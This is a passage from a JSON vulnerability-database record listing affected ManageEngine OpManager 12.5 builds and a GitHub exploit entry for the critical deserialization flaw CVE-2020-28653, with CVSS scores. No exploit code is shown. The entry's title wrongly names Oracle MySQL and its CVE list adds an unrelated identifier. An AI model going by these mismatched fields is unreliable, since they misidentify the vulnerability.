"cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125123:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125312:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125213:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125110:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125197:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125326:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125195:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125124:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125175:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125228:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125100:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125139:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125229:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125212:*:*:*:*:*:*"]}], "githubexploit": [{"lastseen": "2022-02-01T00:00:00", "description": "# Manage Engine OpManager CVE-2020-28653 Proof of Concept\n\nThis ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-13T17:27:02", "type": "githubexploit", "title": "Exploit for Vulnerability in Oracle Mysql", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28653", "CVE-2020-2853"], "modified": "2022-02-05T08:04:25", "id": "0F834290-5FF5-5671-950A-8A63A82265B0", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}]}

ManageEngine OpManager SumPDU Java Deserialization

Description

Related